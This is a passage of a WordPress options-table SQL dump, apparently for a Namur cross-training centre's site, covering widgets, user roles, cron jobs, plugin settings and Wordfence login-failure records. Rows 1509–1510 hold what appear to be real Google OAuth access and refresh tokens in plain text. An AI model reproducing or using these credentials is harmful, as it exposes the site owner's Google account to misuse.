(83, 'widget_text', 'a:3:{i:2;a:9:{s:5:\"title\";s:1:\" \";s:4:\"text\";s:373:\"<iframe src=\"//www.facebook.com/plugins/likebox.php?href=https%3A%2F%2Fwww.facebook.com%2FCrossTrainingCenterDeNamur&amp;width=280&amp;height=590&amp;show_faces=true&amp;colorscheme=light&amp;stream=true&amp;show_border=false&amp;header=true\" scrolling=\"no\" frameborder=\"0\" style=\"border:none; overflow:hidden; width:280px; height:590px;\" allowTransparency=\"true\"></iframe>\";s:6:\"filter\";b:0;s:7:\"page-20\";i:1;s:7:\"page-22\";i:1;s:7:\"page-11\";i:1;s:6:\"page-5\";i:1;s:10:\"dw_include\";i:1;s:9:\"other_ids\";s:0:\"\";}i:3;a:6:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:815:\"<b><u>Adresse :</u></b><br> \r\nBowling et squash de Namur<br>\r\n251 Chssée de Perwelz<br>\r\n5002 Saint-Servais<br>\r\n<br>\r\n<br>\r\n<iframe width=\"280\" height=\"280\" frameborder=\"0\" scrolling=\"no\" marginheight=\"0\" marginwidth=\"0\" src=\"http://maps.google.be/maps?q=251+CHAUSS%C3%89E+DE+PERWEZ+-5002+SAINT-SERVAIS&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002+Namur,+R%C3%A9gion+wallonne&amp;t=m&amp;z=14&amp;ll=50.483687,4.854333&amp;output=embed\"></iframe><br /><small><a href=\"http://maps.google.be/maps?q=251+CHAUSS%C3%89E+DE+PERWEZ+-5002+SAINT-SERVAIS&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002+Namur,+R%C3%A9gion+wallonne&amp;t=m&amp;z=14&amp;ll=50.483687,4.854333&amp;source=embed\" style=\"color:#0000FF;text-align:left\">Agrandir le plan</a></small>\r\n\";s:6:\"filter\";b:0;s:10:\"dw_include\";i:1;s:9:\"other_ids\";s:0:\"\";s:6:\"page-9\";i:1;}s:12:\"_multiwidget\";i:1;}', 'yes'),
(84, 'widget_rss', 'a:0:{}', 'yes'),
(85, 'uninstall_plugins', 'a:1:{s:31:\"slideshow-manager/slideshow.php\";s:25:\"delete_slideshow_database\";}', 'no'),
(86, 'timezone_string', '', 'yes'),
(87, 'page_for_posts', '0', 'yes'),
(88, 'page_on_front', '0', 'yes'),
(89, 'default_post_format', '0', 'yes'),
(90, 'link_manager_enabled', '0', 'yes'),
(91, 'initial_db_version', '22441', 'yes'),
(92, 'wp_user_roles', 'a:5:{s:13:\"administrator\";a:2:{s:4:\"name\";s:13:\"Administrator\";s:12:\"capabilities\";a:63:{s:13:\"switch_themes\";b:1;s:11:\"edit_themes\";b:1;s:16:\"activate_plugins\";b:1;s:12:\"edit_plugins\";b:1;s:10:\"edit_users\";b:1;s:10:\"edit_files\";b:1;s:14:\"manage_options\";b:1;s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:6:\"import\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:8:\"level_10\";b:1;s:7:\"level_9\";b:1;s:7:\"level_8\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:12:\"delete_users\";b:1;s:12:\"create_users\";b:1;s:17:\"unfiltered_upload\";b:1;s:14:\"edit_dashboard\";b:1;s:14:\"update_plugins\";b:1;s:14:\"delete_plugins\";b:1;s:15:\"install_plugins\";b:1;s:13:\"update_themes\";b:1;s:14:\"install_themes\";b:1;s:11:\"update_core\";b:1;s:10:\"list_users\";b:1;s:12:\"remove_users\";b:1;s:9:\"add_users\";b:1;s:13:\"promote_users\";b:1;s:18:\"edit_theme_options\";b:1;s:13:\"delete_themes\";b:1;s:6:\"export\";b:1;s:26:\"total_slider_manage_slides\";b:1;}}s:6:\"editor\";a:2:{s:4:\"name\";s:6:\"Editor\";s:12:\"capabilities\";a:34:{s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;}}s:6:\"author\";a:2:{s:4:\"name\";s:6:\"Author\";s:12:\"capabilities\";a:10:{s:12:\"upload_files\";b:1;s:10:\"edit_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:4:\"read\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:12:\"delete_posts\";b:1;s:22:\"delete_published_posts\";b:1;}}s:11:\"contributor\";a:2:{s:4:\"name\";s:11:\"Contributor\";s:12:\"capabilities\";a:5:{s:10:\"edit_posts\";b:1;s:4:\"read\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:12:\"delete_posts\";b:1;}}s:10:\"subscriber\";a:2:{s:4:\"name\";s:10:\"Subscriber\";s:12:\"capabilities\";a:2:{s:4:\"read\";b:1;s:7:\"level_0\";b:1;}}}', 'yes'),
(93, 'widget_search', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(94, 'widget_recent-posts', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(179, 'widget_tag_cloud', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(95, 'widget_recent-comments', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(96, 'widget_archives', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(97, 'widget_meta', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(98, 'sidebars_widgets', 'a:9:{s:19:\"wp_inactive_widgets\";a:0:{}s:19:\"primary-widget-area\";a:2:{i:0;s:6:\"text-2\";i:1;s:6:\"text-3\";}s:21:\"secondary-widget-area\";a:0:{}s:24:\"first-footer-widget-area\";a:0:{}s:25:\"second-footer-widget-area\";a:0:{}s:24:\"third-footer-widget-area\";a:0:{}s:25:\"fourth-footer-widget-area\";a:0:{}s:5:\"wop-1\";a:1:{i:0;s:21:\"total_slider_widget-2\";}s:13:\"array_version\";i:3;}', 'yes'),
(99, 'cron', 'a:8:{i:1566497103;a:1:{s:19:\"wp_scheduled_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1566497391;a:1:{s:30:\"wp_scheduled_auto_draft_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1566835818;a:1:{s:20:\"wordfence_daily_cron\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1566837183;a:1:{s:25:\"su-sds-blog-load-blog-rss\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1566842692;a:2:{s:17:\"wp_update_plugins\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}s:16:\"wp_update_themes\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1566843292;a:1:{s:16:\"wp_version_check\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1567440000;a:1:{s:31:\"wordfence_email_activity_report\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:2:{s:8:\"schedule\";b:0;s:4:\"args\";a:0:{}}}}s:7:\"version\";i:2;}', 'yes'),
(110982, '_transient_timeout_wflginfl_1605635691', '1492459259', 'no'),
(110983, '_transient_wflginfl_1605635691', '1', 'no'),
(110798, '_transient_timeout_wflginfl_763203023', '1492348959', 'no'),
(110780, '_transient_timeout_wflginfl_609307862', '1492340914', 'no'),
(78985, '_transient_timeout_wflginfl_3165060001', '1467357673', 'no'),
(78986, '_transient_wflginfl_3165060001', '19', 'no'),
(63497, '_transient_timeout_wflginfl_1370589129', '1452380940', 'no'),
(63498, '_transient_wflginfl_1370589129', '19', 'no'),
(59468, '_transient_timeout_wflginfl_825266718', '1447509515', 'no'),
(59469, '_transient_wflginfl_825266718', '1', 'no'),
(124426, '_site_transient_timeout_theme_roots', '1566836021', 'yes'),
(124427, '_site_transient_theme_roots', 'a:4:{s:6:\"figero\";s:7:\"/themes\";s:12:\"twentyeleven\";s:7:\"/themes\";s:14:\"twentythirteen\";s:7:\"/themes\";s:12:\"twentytwelve\";s:7:\"/themes\";}', 'yes'),
(42962, '_transient_wflginfl_1549061393', '1', 'no'),
(51502, '_transient_timeout_wflginfl_1892050805', '1443462017', 'no'),
(51503, '_transient_wflginfl_1892050805', '1', 'no'),
(42873, '_transient_timeout_wflginfl_1317224315', '1437139213', 'no'),
(42874, '_transient_wflginfl_1317224315', '1', 'no'),
(42556, '_transient_timeout_wflginfl_3000938654', '1436976252', 'no'),
(42557, '_transient_wflginfl_3000938654', '1', 'no'),
(42685, '_transient_timeout_wflginfl_3301558171', '1437040791', 'no'),
(108, 'dashboard_widget_options', 'a:4:{s:25:\"dashboard_recent_comments\";a:1:{s:5:\"items\";i:5;}s:24:\"dashboard_incoming_links\";a:5:{s:4:\"home\";s:33:\"http://www.crosstrainingcenter.be\";s:4:\"link\";s:109:\"http://blogsearch.google.com/blogsearch?scoring=d&partner=wordpress&q=link:http://www.crosstrainingcenter.be/\";s:3:\"url\";s:142:\"http://blogsearch.google.com/blogsearch_feeds?scoring=d&ie=utf-8&num=10&output=rss&partner=wordpress&q=link:http://www.crosstrainingcenter.be/\";s:5:\"items\";i:10;s:9:\"show_date\";b:0;}s:17:\"dashboard_primary\";a:7:{s:4:\"link\";s:26:\"http://wordpress.org/news/\";s:3:\"url\";s:31:\"http://wordpress.org/news/feed/\";s:5:\"title\";s:14:\"WordPress Blog\";s:5:\"items\";i:2;s:12:\"show_summary\";i:1;s:11:\"show_author\";i:0;s:9:\"show_date\";i:1;}s:19:\"dashboard_secondary\";a:7:{s:4:\"link\";s:28:\"http://planet.wordpress.org/\";s:3:\"url\";s:33:\"http://planet.wordpress.org/feed/\";s:5:\"title\";s:20:\"Other WordPress News\";s:5:\"items\";i:5;s:12:\"show_summary\";i:0;s:11:\"show_author\";i:0;s:9:\"show_date\";i:0;}}', 'yes'),
(55401, '_transient_wflginfl_1500678369', '1', 'no'),
(55403, '_transient_timeout_wflginfl_3196637122', '1445916830', 'no'),
(55404, '_transient_wflginfl_3196637122', '1', 'no'),
(55405, '_transient_timeout_wflginfl_3065386986', '1445917405', 'no'),
(55406, '_transient_wflginfl_3065386986', '1', 'no'),
(55407, '_transient_timeout_wflginfl_3000943102', '1445917822', 'no'),
(55408, '_transient_wflginfl_3000943102', '1', 'no'),
(55409, '_transient_timeout_wflginfl_2925839231', '1445918040', 'no'),
(55410, '_transient_wflginfl_2925839231', '1', 'no'),
(55411, '_transient_timeout_wflginfl_3515041986', '1445918622', 'no'),
(55412, '_transient_wflginfl_3515041986', '1', 'no'),
(57498, '_transient_timeout_wflginfl_3051494737', '1446674689', 'no'),
(57499, '_transient_wflginfl_3051494737', '1', 'no'),
(55417, '_transient_timeout_wflginfl_1568597595', '1445919717', 'no'),
(55418, '_transient_wflginfl_1568597595', '1', 'no'),
(56072, '_transient_timeout_wflginfl_1128588109', '1446078972', 'no'),
(56073, '_transient_wflginfl_1128588109', '1', 'no'),
(55421, '_transient_timeout_wflginfl_690480771', '1445920231', 'no'),
(55422, '_transient_wflginfl_690480771', '1', 'no'),
(1454, 'ga_version', '6.4.5', 'yes'),
(1461, 'key_ga_show_ad', '1', 'yes'),
(1492, 'ga_status', 'enabled', 'yes'),
(1493, 'ga_uid', 'UA-43427378-1', 'yes'),
(1494, 'ga_admin_status', 'enabled', 'yes'),
(1495, 'ga_admin_disable', 'remove', 'yes'),
(1496, 'ga_admin_role', 'a:1:{i:0;s:13:\"administrator\";}', 'yes'),
(1497, 'ga_dashboard_role', 'a:1:{i:0;s:13:\"administrator\";}', 'yes'),
(1498, 'ga_adsense', '', 'yes'),
(1499, 'ga_extra', '', 'yes'),
(1500, 'ga_extra_after', '', 'yes'),
(1501, 'ga_event', 'enabled', 'yes'),
(1502, 'ga_outbound', 'enabled', 'yes'),
(1503, 'ga_outbound_prefix', 'outgoing', 'yes'),
(1504, 'ga_downloads', '', 'yes'),
(1505, 'ga_downloads_prefix', 'download', 'yes'),
(1506, 'ga_widgets', 'enabled', 'yes'),
(1507, 'ga_annon', '0', 'yes'),
(1508, 'ga_defaults', 'no', 'yes'),
(1509, 'ga_google_token', '4/dNk5yqbLvToGOr1L7AxlR-X-8Ajt.EujwRiWfyc0aOl05ti8ZT3Yx2ttUgQI', 'yes'),
(1510, 'ga_google_authtoken', '{\"access_token\":\"ya29.AHES6ZRbkgsrQiqi5K4snq6eD62QKMa5qD6wa3jo62-mJRCzxnoZjA\",\"token_type\":\"Bearer\",\"expires_in\":3600,\"refresh_token\":\"1\\/OfCFSCmF7A0ckb7rn1b2TIgqTbSrbglAQ6AYdvuZWUQ\",\"created\":1377248758}', 'yes'),
(1511, 'ga_enable_remarketing', '0', 'yes'),
(1512, 'key_ga_track_login', '0', 'yes'),
(780, 'seo_ultimate_module_more-links', 'a:1:{s:7:\"default\";s:45:\"Continue reading &#8220;{post}&#8221; &raquo;\";}', 'yes'),
(781, 'seo_ultimate_module_opengraph', 'a:6:{s:20:\"default_post_og_type\";s:7:\"article\";s:20:\"default_page_og_type\";s:7:\"article\";s:25:\"default_post_twitter_card\";s:7:\"summary\";s:25:\"default_page_twitter_card\";s:7:\"summary\";s:31:\"default_attachment_twitter_card\";s:5:\"photo\";s:24:\"enable_og_article_author\";b:1;}', 'yes'),
(782, 'seo_ultimate_module_permalinks', 'a:1:{s:20:\"add_rule_if_conflict\";b:1;}', 'yes'),
(783, 'seo_ultimate_module_sharing-buttons', 'a:3:{s:8:\"provider\";s:4:\"none\";s:14:\"sharethis_code\";s:104:\"<script type=\"text/javascript\" charset=\"utf-8\" src=\"http://w.sharethis.com/widget/?wp={wpver}\"></script>\";s:12:\"addthis_code\";s:298:\"<a class=\"addthis_button\" href=\"http://addthis.com/bookmark.php?v=250\"><img src=\"http://s7.addthis.com/static/btn/v2/lg-share-en.gif\" width=\"125\" height=\"16\" alt=\"Bookmark and Share\" style=\"border:0\"/></a><script type=\"text/javascript\" src=\"http://s7.addthis.com/js/250/addthis_widget.js\"></script>\";}', 'yes'),
(216, 'recently_activated', 'a:0:{}', 'yes'),
(402, 'total_slider_slides_objectifs', 'a:2:{i:0;a:7:{s:2:\"id\";s:22:\"51bda731e758a799802144\";s:5:\"title\";s:20:\"Coaching personnel :\";s:11:\"description\";s:163:\"Un coach vous suivra tout au long de vos séances pour vous proposer des exercices adaptés à votre niveau, vos objectifs et vos caractéristiques individuelles. \";s:10:\"background\";s:1:\"0\";s:4:\"link\";s:0:\"\";s:11:\"title_pos_x\";i:278;s:11:\"title_pos_y\";i:178;}i:1;a:7:{s:2:\"id\";s:22:\"51bda771a2759105225246\";s:5:\"title\";s:27:\"Encadrement professionnel :\";s:11:\"description\";s:152:\"Notre équipe est composée de spécialistes issus du milieu de l’éducation physique, de la kinésithérapie, de la diététique et de la médecine. \";s:10:\"background\";s:2:\"68\";s:4:\"link\";s:0:\"\";s:11:\"title_pos_x\";i:278;s:11:\"title_pos_y\";i:178;}}', 'yes'),
(407, 'widget_total_slider_widget', 'a:2:{i:2;a:3:{s:9:\"groupSlug\";s:9:\"objectifs\";s:10:\"dw_include\";i:0;s:9:\"other_ids\";s:0:\"\";}s:12:\"_multiwidget\";i:1;}', 'yes'),
(505, 'piklist_active_plugin_versions', 'a:2:{s:19:\"piklist/piklist.php\";a:2:{i:0;s:5:\"0.7.2\";i:1;s:5:\"0.7.2\";}s:35:\"clicface-trombi/clicface-trombi.php\";a:3:{i:0;s:4:\"1.09\";i:1;s:4:\"1.08\";i:2;s:4:\"1.08\";}}', 'yes'),
(506, 'piklist_post_type_rules_flushed', 'a:1:{s:13:\"collaborateur\";b:1;}', 'yes'),
(399, 'total_slider_slide_groups', 'a:1:{i:0;O:17:\"Total_Slide_Group\":5:{s:4:\"slug\";s:9:\"objectifs\";s:12:\"originalSlug\";s:9:\"objectifs\";s:4:\"name\";s:9:\"Objectifs\";s:16:\"templateLocation\";s:7:\"builtin\";s:8:\"template\";s:7:\"default\";}}', 'yes'),
(400, 'total_slider_general_options', 'a:2:{s:23:\"should_enqueue_template\";s:1:\"1\";s:26:\"should_show_tinymce_button\";s:1:\"1\";}', 'yes'),
(401, 'total_slider_dataformat_version', '1.1', 'yes'),
(55639, '_transient_wflginfl_1592153798', '1', 'no'),
(55640, '_transient_timeout_wflginfl_1445391328', '1445971447', 'no'),
(55641, '_transient_wflginfl_1445391328', '1', 'no'),
(55642, '_transient_timeout_wflginfl_1509488751', '1445972117', 'no'),
(55643, '_transient_wflginfl_1509488751', '1', 'no'),
(55644, '_transient_timeout_wflginfl_2538460914', '1445972806', 'no'),
(55645, '_transient_wflginfl_2538460914', '1', 'no'),
(55646, '_transient_timeout_wflginfl_1891933910', '1445972808', 'no'),
(55647, '_transient_wflginfl_1891933910', '1', 'no'),
(55649, '_transient_timeout_wflginfl_1507372348', '1445973106', 'no'),
(55650, '_transient_wflginfl_1507372348', '1', 'no'),
(55651, '_transient_timeout_wflginfl_1558511737', '1445973995', 'no'),
(55652, '_transient_wflginfl_1558511737', '1', 'no'),
(55657, '_transient_timeout_wflginfl_1451895568', '1445974136', 'no'),
(55658, '_transient_wflginfl_1451895568', '1', 'no'),
(55661, '_transient_timeout_wflginfl_2884132964', '1445974929', 'no'),
(55662, '_transient_wflginfl_2884132964', '1', 'no'),
(55663, '_transient_timeout_wflginfl_1549834870', '1445974995', 'no'),
(55664, '_transient_wflginfl_1549834870', '1', 'no'),
(56368, '_transient_timeout_wflginfl_1337007283', '1446212801', 'no'),
(56369, '_transient_wflginfl_1337007283', '1', 'no'),
(56636, '_transient_timeout_wflginfl_3393908909', '1446377124', 'no'),
(56637, '_transient_wflginfl_3393908909', '1', 'no'),
(55669, '_transient_timeout_wflginfl_2835360327', '1445976165', 'no'),
(55670, '_transient_wflginfl_2835360327', '1', 'no'),
(55671, '_transient_timeout_wflginfl_712202854', '1445976548', 'no'),
(55672, '_transient_wflginfl_712202854', '1', 'no'),
(55675, '_transient_timeout_wflginfl_84781879', '1445976656', 'no'),
(55676, '_transient_wflginfl_84781879', '1', 'no'),
(55679, '_transient_timeout_wflginfl_3139473985', '1445977890', 'no'),
(55680, '_transient_wflginfl_3139473985', '1', 'no'),
(60179, '_transient_timeout_wflginfl_1333638053', '1448244087', 'no'),
(48411, '_transient_timeout_wflginfl_1349906560', '1441685492', 'no'),
(48412, '_transient_wflginfl_1349906560', '1', 'no'),
(50932, '_transient_timeout_wflginfl_1599899743', '1443055732', 'no'),
(50933, '_transient_wflginfl_1599899743', '1', 'no'),
(48415, '_transient_timeout_wflginfl_1153598319', '1441686049', 'no'),
(48416, '_transient_wflginfl_1153598319', '1', 'no'),
(48417, '_transient_timeout_wflginfl_1370982165', '1441686524', 'no'),
(48418, '_transient_wflginfl_1370982165', '1', 'no'),
(48421, '_transient_timeout_wflginfl_3150016837', '1441687443', 'no'),
(48422, '_transient_wflginfl_3150016837', '1', 'no'),
(48652, '_transient_timeout_wflginfl_2087432093', '1441735107', 'no'),
(48653, '_transient_wflginfl_2087432093', '1', 'no'),
(48427, '_transient_timeout_wflginfl_3523693459', '1441697844', 'no'),
(48428, '_transient_wflginfl_3523693459', '2', 'no'),
(48429, '_transient_timeout_wflginfl_1464659474', '1441690257', 'no'),
(48430, '_transient_wflginfl_1464659474', '1', 'no'),
(48669, '_transient_timeout_wflginfl_1442505767', '1441737749', 'no'),
(48670, '_transient_wflginfl_1442505767', '1', 'no'),
(48433, '_transient_timeout_wflginfl_1371666129', '1441690789', 'no'),
(48434, '_transient_wflginfl_1371666129', '1', 'no'),
(49494, '_transient_timeout_wflginfl_3049028856', '1442092519', 'no'),
(49495, '_transient_wflginfl_3049028856', '1', 'no'),
(48439, '_transient_timeout_wflginfl_1463445926', '1441693295', 'no'),
(48440, '_transient_wflginfl_1463445926', '1', 'no'),
(48441, '_transient_timeout_wflginfl_3201252549', '1441693370', 'no'),
(48442, '_transient_wflginfl_3201252549', '1', 'no'),
(52783, '_transient_timeout_wflginfl_3165519810', '1444344839', 'no'),
(52784, '_transient_wflginfl_3165519810', '1', 'no'),
(48612, '_transient_timeout_wflginfl_1833742960', '1441726397', 'no'),
(48613, '_transient_wflginfl_1833742960', '1', 'no'),
(48447, '_transient_timeout_wflginfl_1442084082', '1441695675', 'no'),
(48448, '_transient_wflginfl_1442084082', '1', 'no'),
(48449, '_transient_timeout_wflginfl_1245838204', '1441695818', 'no'),
(48450, '_transient_wflginfl_1245838204', '1', 'no'),
(48453, '_transient_timeout_wflginfl_1333143504', '1441697788', 'no'),
(48454, '_transient_wflginfl_1333143504', '1', 'no'),
(48455, '_transient_timeout_wflginfl_1976777157', '1441698622', 'no'),
(48456, '_transient_wflginfl_1976777157', '1', 'no'),
(48457, '_transient_timeout_wflginfl_86812804', '1441712347', 'no'),
(48458, '_transient_wflginfl_86812804', '2', 'no'),
(48459, '_transient_timeout_wflginfl_3412747690', '1441699145', 'no'),
(48460, '_transient_wflginfl_3412747690', '1', 'no'),
(48461, '_transient_timeout_wflginfl_244071213', '1441699541', 'no'),
(48462, '_transient_wflginfl_244071213', '1', 'no'),
(48464, '_transient_timeout_wflginfl_2835371987', '1441699954', 'no'),
(48465, '_transient_wflginfl_2835371987', '1', 'no'),
(48468, '_transient_timeout_wflginfl_3065880444', '1441701160', 'no'),
(48469, '_transient_wflginfl_3065880444', '1', 'no'),
(48470, '_transient_timeout_wflginfl_3707039826', '1441702595', 'no'),
(48471, '_transient_wflginfl_3707039826', '1', 'no'),
(48472, '_transient_timeout_wflginfl_1445928200', '1441702811', 'no'),
(48473, '_transient_wflginfl_1445928200', '1', 'no'),
(48476, '_transient_timeout_wflginfl_3529057918', '1441703517', 'no'),
(48477, '_transient_wflginfl_3529057918', '1', 'no'),
(48478, '_transient_timeout_wflginfl_84683068', '1441705394', 'no'),
(48479, '_transient_wflginfl_84683068', '1', 'no'),
(48482, '_transient_timeout_wflginfl_3562713042', '1441705595', 'no'),
(48483, '_transient_wflginfl_3562713042', '1', 'no'),
(48484, '_transient_timeout_wflginfl_1816236694', '1441705723', 'no'),
(48485, '_transient_wflginfl_1816236694', '1', 'no'),
(48488, '_transient_timeout_wflginfl_1549220444', '1441706061', 'no'),
(48489, '_transient_wflginfl_1549220444', '1', 'no'),
(48490, '_transient_timeout_wflginfl_1333962905', '1441706386', 'no'),
(48491, '_transient_wflginfl_1333962905', '1', 'no'),
(48498, '_transient_timeout_wflginfl_3341841207', '1441707187', 'no'),
(48499, '_transient_wflginfl_3341841207', '1', 'no'),
(51798, '_transient_timeout_wflginfl_846638137', '1443707268', 'no'),
(51799, '_transient_wflginfl_846638137', '1', 'no'),
(51802, '_transient_timeout_wflginfl_1975715652', '1443709234', 'no'),
(51803, '_transient_wflginfl_1975715652', '1', 'no'),
(51806, '_transient_timeout_wflginfl_2535678506', '1443713206', 'no'),
(51807, '_transient_wflginfl_2535678506', '1', 'no'),
(51817, '_transient_timeout_wflginfl_3003099163', '1443724277', 'no'),
(51818, '_transient_wflginfl_3003099163', '1', 'no'),
(51819, '_transient_timeout_wflginfl_3170322450', '1443724537', 'no'),
(51820, '_transient_wflginfl_3170322450', '1', 'no'),
(48500, '_transient_timeout_wflginfl_3144347038', '1441708710', 'no'),
(48501, '_transient_wflginfl_3144347038', '1', 'no'),
(49837, '_transient_timeout_wflginfl_1391272651', '1442308251', 'no'),
(49838, '_transient_wflginfl_1391272651', '1', 'no'),
(48505, '_transient_timeout_wflginfl_1834789776', '1441710677', 'no'),
(48506, '_transient_wflginfl_1834789776', '1', 'no'),
(48507, '_transient_timeout_wflginfl_1222937261', '1441711020', 'no'),
(48508, '_transient_wflginfl_1222937261', '1', 'no'),
(48515, '_transient_timeout_wflginfl_1906480867', '1441711356', 'no'),
(48516, '_transient_wflginfl_1906480867', '1', 'no'),
(48517, '_transient_timeout_wflginfl_1590280563', '1441712000', 'no'),
(48518, '_transient_wflginfl_1590280563', '1', 'no'),
(48823, '_transient_timeout_wflginfl_1373236552', '1441783991', 'no'),
(48824, '_transient_wflginfl_1373236552', '1', 'no'),
(48521, '_transient_timeout_wflginfl_1598919529', '1441712499', 'no'),
(48522, '_transient_wflginfl_1598919529', '1', 'no'),
(48523, '_transient_timeout_wflginfl_1834837256', '1441712843', 'no'),
(48524, '_transient_wflginfl_1834837256', '1', 'no'),
(48525, '_transient_timeout_wflginfl_1328180925', '1441712950', 'no'),
(48526, '_transient_wflginfl_1328180925', '1', 'no'),
(48527, '_transient_timeout_wflginfl_1300211687', '1441713872', 'no'),
(48528, '_transient_wflginfl_1300211687', '1', 'no'),
(48529, '_transient_timeout_wflginfl_84880435', '1441713996', 'no'),
(48530, '_transient_wflginfl_84880435', '1', 'no'),
(48531, '_transient_timeout_wflginfl_704514420', '1441714054', 'no'),
(48532, '_transient_wflginfl_704514420', '1', 'no'),
(48533, '_transient_timeout_wflginfl_3155704219', '1441714074', 'no'),
(48534, '_transient_wflginfl_3155704219', '1', 'no'),
(48537, '_transient_timeout_wflginfl_3000913942', '1441714680', 'no'),
(48538, '_transient_wflginfl_3000913942', '1', 'no'),
(48885, '_transient_timeout_wflginfl_3163012943', '1441815321', 'no'),
(48886, '_transient_wflginfl_3163012943', '1', 'no'),
(48543, '_transient_timeout_wflginfl_1356626918', '1441716094', 'no'),
(48544, '_transient_wflginfl_1356626918', '1', 'no'),
(48545, '_transient_timeout_wflginfl_1372390680', '1441716328', 'no'),
(48546, '_transient_wflginfl_1372390680', '1', 'no'),
(48547, '_transient_timeout_wflginfl_1588743385', '1441716653', 'no'),
(48548, '_transient_wflginfl_1588743385', '1', 'no'),
(48549, '_transient_timeout_wflginfl_2070847613', '1441716702', 'no'),
(48550, '_transient_wflginfl_2070847613', '1', 'no'),
(48555, '_transient_timeout_wflginfl_2662727279', '1441719231', 'no'),
(48553, '_transient_timeout_wflginfl_831913275', '1441718591', 'no'),
(48554, '_transient_wflginfl_831913275', '1', 'no'),
(48556, '_transient_wflginfl_2662727279', '1', 'no'),
(48693, '_transient_timeout_wflginfl_1473974483', '1441742082', 'no'),
(48694, '_transient_wflginfl_1473974483', '1', 'no'),
(48561, '_transient_timeout_wflginfl_1771893755', '1441720482', 'no'),
(48562, '_transient_wflginfl_1771893755', '1', 'no'),
(48563, '_transient_timeout_wflginfl_1280839909', '1441720651', 'no'),
(48564, '_transient_wflginfl_1280839909', '1', 'no'),
(48565, '_transient_timeout_wflginfl_1426049975', '1441720830', 'no'),
(48566, '_transient_wflginfl_1426049975', '1', 'no'),
(48567, '_transient_timeout_wflginfl_2078768800', '1441721086', 'no'),
(48568, '_transient_wflginfl_2078768800', '1', 'no'),
(48571, '_transient_timeout_wflginfl_1897218318', '1441721373', 'no'),
(48572, '_transient_wflginfl_1897218318', '1', 'no'),
(48574, '_transient_timeout_wflginfl_1941579946', '1441721613', 'no'),
(48575, '_transient_wflginfl_1941579946', '1', 'no'),
